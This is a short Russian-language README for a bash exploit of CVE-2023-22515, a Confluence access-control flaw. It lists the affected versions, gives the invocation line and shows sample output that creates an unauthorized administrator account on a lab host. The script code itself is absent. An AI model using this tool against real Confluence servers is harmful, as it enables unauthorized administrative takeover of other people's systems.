
Bash-скрипт, который эксплуатирует CVE-2023-22515 в Confluence Data Center и Server для создания несанкционированных учётных записей администратора, обеспечивая несанкционированный доступ.
Простой эксплойт на bash для CVE-2023-22515.
В Confluence Data Center и Server существует уязвимость нарушения контроля доступа (CVE-2023-22515), позволяющая злоумышленникам создавать несанкционированные учётные записи администратора Confluence и получать доступ к экземплярам Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Проверка уязвимости хоста...
Уязвим --> Код ответа: 200
[+] Эксплуатация цели...
[+] Эксплойт завершён!!!
[INFO] Пользователь создан: a123456
[INFO] Пароль создан: ChangeMe123